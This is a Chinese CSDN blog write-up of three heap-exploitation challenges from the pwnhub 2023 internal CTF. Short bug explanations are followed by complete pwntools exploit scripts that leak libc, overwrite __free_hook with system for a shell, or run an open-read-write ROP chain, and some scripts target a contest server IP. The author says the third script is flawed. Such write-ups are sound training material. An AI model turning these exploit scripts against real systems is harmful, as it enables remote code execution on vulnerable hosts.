pwnhub2023内部赛

最新推荐文章于 2024-05-30 11:43:13 发布
最新推荐文章于 2024-05-30 11:43:13 发布
阅读量235 收藏
点赞数 1
文章标签: 网络安全 python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73290593/article/details/129539748
版权

pwnhub2023-内部赛

ttsc

1.输出name时,%s可以leak栈地址,age和high部分,scanf输入‘-’可以不改变原来地址的值,即可泄露libc地址。

2.edit存在off-by-one,来制造overlapping,控制fd指针,打__free_hook即可

from pwn import *
context.update(os='linux',arch='amd64',timeout=1)
context.log_level='debug'
binary='./ttsc'
elf=ELF(binary)
libc=ELF('./libc-2.27.so')
debug=0
if debug:
    libc=elf.libc
    p=process(binary)
else:
    host='121.40.89.206'
    port='20111'
    p=remote(host,port)

menu="chs:"
def add(idx,size,content):
    p.sendlineafter(menu,'1')
    p.sendlineafter("index?",str(idx))
    p.sendlineafter("size:",str(size))
    sleep(0.2)
    p.send(content)

def delete(idx):
    p.sendlineafter(menu,'2')
    p.sendlineafter("index?",str(idx))

def edit(idx,content):
    p.sendlineafter(menu,'3')
    p.sendlineafter("index?",str(idx))
    p.sendafter("content:",content)

def debug():
    gdb.attach(p)
    pause()

def pwn():

    p.recvuntil("name?")
    p.send('a'*0x10)

    p.recvuntil("age?")
    p.sendline('-')

    p.recvuntil("high?")
    p.sendline('-')

    p.recvuntil("name: ")
    rbp_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x10

    p.recvuntil("age: ")
    addr1=int(p.recvn(10),10)
    p.recvuntil("high: ")
    addr2=int(p.recvn(5),10)<<32

    libc_base=(addr1+addr2)-libc.sym["_IO_file_jumps"]
    system=libc_base+libc.sym["system"]
    bin_sh=libc_base+next(libc.search("/bin/sh"))
    __free_hook=libc_base+libc.sym["__free_hook"]
    pop_rdi_ret=libc_base+0x2164f
    pop_rsi_ret=libc_base+0x23a6a
    pop_rdx_ret=libc_base+0x1b96
    ret=libc_base+0x8aa
    log.info("libc_base-->"+hex(libc_base))
    log.info("rbp_addr-->"+hex(rbp_addr))

    add(0,0x38,b'a')
    add(1,0x38,b'a')
    add(2,0x38,b'a')

    delete(2)

    payload='a'*0x38+p8(0x81)
    edit(0,payload)

    delete(1)

    payload='a'*0x38+p64(0x41)+p64(__free_hook)
    add(1,0x78,payload)

    add(2,0x38,'/bin/sh\x00')

    delete(1)

    add(1,0x38,p64(system))

    delete(2)

    p.interactive()

pwn()

three_edit

1.edit没有对idx下限检查,可以达成edit-after-free,来修改fd指针的低一字节,来申请到chunk头附近,进而控制chunk_size和fd指针,达成overlapping,

2.再来达成chunk同时在tcachebin和unsortedbin,进而控制fd指向stdout来leaklibc,然后打__free_hook即可

from pwn import *
context.update(os='linux',arch='amd64',timeout=1)
#context.log_level='debug'
binary='./three_edit'
elf=ELF(binary)
libc=ELF('./libc-2.31.so')
# debug=1
# if debug:
#     libc=elf.libc
#     p=process(binary)
# else:
#     host=''
#     port=''
#     p=remote(host,port)

menu="is:"
def add(idx,size,content):
    p.sendlineafter(menu,'1')
    p.sendlineafter("index:",str(idx))
    p.sendlineafter("size:",str(size))
    p.sendlineafter("content:",content)

def delete(idx):
    p.sendlineafter(menu,'2')
    p.sendlineafter("index?",str(idx))

def edit(idx,content):
    p.sendlineafter(menu,'3')
    p.sendlineafter("index?",str(idx))
    p.sendlineafter("content:",content)

def debug():
    gdb.attach(p)
    pause()

def pwn():
    for i in range(13):
        add(i,0x60,'a')

    delete(1)
    delete(0)

    edit(-0x3d,p8(0x60))
    #debug()
    payload='\x00'*0x10+p64(0)+p64(0x461)
    add(0,0x60,'a')
    add(1,0x60,payload)

    delete(5)
    delete(4)

    delete(2)
    add(13,0x50,'a')
    add(14,0x70,p64(0)+p64(0x71))
    #debug()
    edit(-0x3d,p16(0x26a0))
    #debug()
    add(4,0x60,'a')

    payload=p64(0xfbad1800)+p64(0)*3+'\x00'
    add(5,0x60,payload)

    libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1eb980
    __free_hook=libc_base+libc.sym["__free_hook"]
    system=libc_base+libc.sym["system"]
    log.info("libc_base-->"+hex(libc_base))

    delete(7)
    delete(3)
    
    payload=p64(0)+p64(0x71)+p64(__free_hook)
    edit(14,payload)
    #debug()
    add(3,0x60,'/bin/sh\x00')
    add(7,0x60,p64(system))

    delete(3)

    p.interactive()
     
while True:
    try:
        p=remote("121.40.89.206",21795)
        pwn()
        break
    except:
        p.close()

tototo

1.存在UAF,申请一个大chunk,再分割成小chunk,就可以控制fd指针,用environ泄露栈地址,打orw。(但是写的有些问题,找不出来,仅供参考思路)

from pwn import *
context.update(os='linux',arch='amd64',timeout=1)
context.log_level='debug'
binary='./tototo'
elf=ELF(binary)
libc=ELF('./libc-2.31.so')
debug=1
if debug:
    libc=elf.libc
    p=process(binary)
else:
    host='121.40.89.206'
    port='36789'
    p=remote(host,port)

menu="is:"
def add(idx,size):
    p.sendlineafter(menu,'1')
    p.sendlineafter("index?",str(idx))
    p.sendlineafter("size?",str(size))

def delete(idx):
    p.sendlineafter(menu,'2')
    p.sendlineafter("one?",str(idx))

def edit(idx,content):
    p.sendlineafter(menu,'3')
    p.sendlineafter("one?",str(idx))
    p.sendlineafter("content?",content)

def show(idx):
    p.sendlineafter(menu,'4')
    p.sendlineafter("one?\n",str(idx))

def calloc(idx,size):
    p.sendlineafter(menu,'5')
    p.sendlineafter("index?",str(idx))
    p.sendlineafter("size?",str(size))

def debug():
    gdb.attach(p)
    pause()

def pwn():
    calloc(0,0x620)
    calloc(1,0x200)
    
    delete(0)
    show(0)
    #debug()
    libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1ebbe0
    environ=libc_base+libc.sym["environ"]
    open_addr=libc_base+libc.sym["open"]
    read_addr=libc_base+libc.sym["read"]
    write_addr=libc_base+libc.sym["write"]
    pop_rdi_ret=libc_base+0x26b72
    pop_rsi_ret=libc_base+0x27529
    pop_rdx_rbx_ret=libc_base+0x1626d6
    ret=libc_base+0x25679
    log.info("libc_base-->"+hex(libc_base))

    add(2,0x200)
    add(3,0x200)
    add(4,0x200)

    delete(1)
    delete(3)

    show(3)
    heap_base=u64(p.recvn(6).ljust(8,'\x00'))-0x8d0
    log.info("heap_base-->"+hex(heap_base))
    payload='a'*(0x208-9)+p64(0x211)+p64(environ)
    edit(0,payload)
    #debug()
    add(5,0x200)# 5&3
    add(6,0x200)

    show(6)
    rbp_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x128
    log.info("rbp_addr-->"+hex(rbp_addr))

    delete(4)
    delete(5)

    payload='\x00'*(0x208-9)+p64(0x211)+p64(rbp_addr-0x10)
    edit(0,payload)
    #debug()
    add(7,0x200)
    #debug()
    add(8,0x200)
    #debug()
    #gdb.attach(p,'b *$rebase(0x187a)')

    rop='\x00'*0x7+"./flag\x00\x00"
    rop+=p64(pop_rdi_ret)+p64(rbp_addr)
    rop+=p64(pop_rsi_ret)+p64(0)
    rop+=p64(open_addr)
    rop+=p64(pop_rdi_ret)+p64(3)
    rop+=p64(pop_rsi_ret)+p64(heap_base+0x2a0)
    rop+=p64(pop_rdx_rbx_ret)+p64(0x30)+p64(0)
    rop+=p64(read_addr)
    rop+=p64(pop_rdi_ret)+p64(1)
    rop+=p64(write_addr)

    edit(8,rop)

    p.interactive()

pwn()

在这里插入图片描述
在这里插入图片描述

enllus1on
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PWNHUB 七月内部 babyboa、美好的异或 Writeup
Internet_xx的博客
07-31 597
                                          &nbs
PWNHUB 一场新鲜事速达【六月内部】 web - login game + Misc - 伏羲八卦
ShenZ的博客
06-13 1264
PWNHUB 一场新鲜事速达【六月内部】 web - login game + Misc - 伏羲八卦 给了源码,大概就是login登陆,upload上传,上传同时有解压extractFile函数 tarfile库的extractall或extract方法存在目录穿越漏洞,可以进行文件覆盖再看login路由 如果登陆的用户名为Admin,则读取config/userConfig.yaml文件,yaml.load转换为python数据类型yaml.load详情可以看看官方wiki PyYAML......
[pwnhub 2023.3] 内部pwn专题
weixin_52640415的博客
03-12 907
libc-2.31,libc-2.27无show 劫持_IO_2_1_stdout_,libc.sym['_environ']得到栈地址再在栈中写orw
[PWNHUB 2022 5月公开&&内部web部分]
weixin_45751765的博客
05-17 785
1NDEX0x00 前言公开Templateplay看看官方的wpMyNotesphp session序列化机制brain.md内部MockingMail反思0x01 rethink 0x00 前言 打了一下pwnhub补充了一下知识库,发现自己还是太菜了,有些地方确实不懂 公开 Templateplay 主页没看到什么注入点 js改个UA就进 很明显的ssti 过滤很多,先fuzz一下 直接出来了… 爽局 用fuzz的payload直接cat flag会500不怎么理解 最后用nl * 才看到
PWNHUB 五月公开+内部 writeup(【5月公开】MyNotes TemplatePlay 【胖哈勃内部|五月,你好】MockingMail)
ShenZ的博客
05-19 796
PWNHUB 【5月公开】MyNotes 【5月公开】TemplatePlay 【胖哈勃内部|五月,你好!】MockingMail 【胖哈勃内部|五月,你好!】MISC-Unicode session反序列化伪造 给了源码,admin界面会给flag, "phpmailer/phpmailer": "6.4.1",有个CVE-2021-3603 PHP Mailer 最新代码执行漏洞,漏洞函数是validateAddress(),本体中两个参数都可控
[PWNHUB 2022 6月内部web部分]login game
weixin_45751765的博客
06-14 422
出去旅游了… 没打到比有点亏 来复现一下 zip-slip-vulnerabilityzip slip漏洞影响库 pyYaml库版本 PyYAML反序列化漏洞 师傅文章扫扫盲tarfile进行zip slip文件覆盖userConfig.yaml 然后pyyaml反序列化漏洞 太穷了 只有一台学生机 userConfig.yaml gene_evil_tar.py poc.py 果然还是得while True竞争 以下引用自 https://xz.aliyun.com/t/7923#toc-8 看些关
pwnhub三月 ttsc
z1r0的博客
03-14 292
age这里是lodword(v8),然后v2那里是hidwod,直接泄露出age这里的地址,发现是_IO_file_jumps。进一步获取libc,拿到libc之后就直接利用上面的漏洞打堆重叠,然后打fd到hook,打hook为ogg就行了。这里最大的坑就是有延迟,需要sleep来等一下,不然发瞎发送。一开始以为没什么用,在随便输的时候发现-可以直接泄露出地址。但是次数都很少,打起来太麻烦了,开头给了三次输入功能。拿到邀请码发现内部打不了,只能等比结束做了。漏洞点很简单,可以直接覆盖size。
网络安全技术CTF竞模式与训练平台
caoyongsheng的博客
08-19 3819
CTF竞是安全圈喜闻乐见的竞模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球黑客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比形式已经日益成熟。以国内的情况来看,一般的竞技模式分为线上初选,和线下决两个竞技阶段。 CTF注重动手技能,深厚的理论功底厚积薄发,技术的卓越是建立在无数次训练的基础上,那么我们来看看有哪些不错的平台可以来用于比训练。 夺旗 一般线上初选采用传统的夺旗模式,也就是在题目中设置一些标识,解题
从0到1 CTFer成功之路》任意文件读取漏洞---学习笔记
aweiname2008的博客
08-08 4773
1.3 任意文件读取漏洞 所谓文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。从整个攻击过程来看,它常常作为资产信息搜集的一种强力的补充手段,服务器的各种配置文件、文件形式存储的密钥、服务器信息(包括正在执行的进程信息)、历史命令、网络信息、应用源码及二进制程序都在这个漏洞触发点被攻击者窥探。 文件读取漏洞常常意味着被攻击者的服务器即将被攻击者彻底控制。当然,如果服务器严格按照标准的安全规范进行部署,即使应用中存在可利用的文件读取漏洞,攻击者也很难拿到有价值的信息。文件读取漏洞在
PwnHub2022冬季-部分真题
12-20
PwnHub2022冬季-部分真题
PWNHUB-公开一期MISC-Perseverance(WP).pdf
03-22
这一道题,写了10页,这个WP还是参考pcat师傅的WP写的,我很菜,真的菜
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何mysql数据导入到mongdb
codemami的博客
05-30 774
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
Python 具体能干什么?
猿小白的博客
05-26 1241
Python 是一种功能强大、用途广泛的编程语言,因其简洁易读的语法和丰富的库生态系统而备受欢迎。
在linux服务器上使用tensorboard,错误记录
最新发布
wwwwzm的博客
05-30 480
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
Pandas03
Bianca427的博客
05-27 1227
聚合计算时新增一列计算最大值与平均值的差值df.groupby('district').agg(最低工资=('salary', 'min'), 最高工资=('salary', 'max'), 平均工资=('salary', 'mean'), 最大值与均值差值=('salary', myfunc)).rename_axis(["行政区"])
深入理解Python中None和““的区别
m0_54701273的博客
05-27 788
Python的世界里,None和空字符串""经常被用作默认值或用于表示缺省值的情况。尽管它们在某些语境下似乎可互换,但实际上None和""在Python中有着根本的区别。
生命在于学习——Python人工智能原理(2.1)
易水哲的博客
05-27 1462
机器学习是指从有限的观测数据中学习出具有一般性的规律。
ModuleNotFoundError: No module named '_ctypes' when Python3
牛奔的博客
05-28 306
前言 运行 python 报错:ModuleNotFoundError: No module named '_ctypes' when using Value from module multiprocessing 这个错误是由于缺少 Python 的 ctypes 模块导致的。ctypes 模块是 Python 标准库的一部分,但在某些 Linux 发行版上可能需要单独安装。 解决 如果使用 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值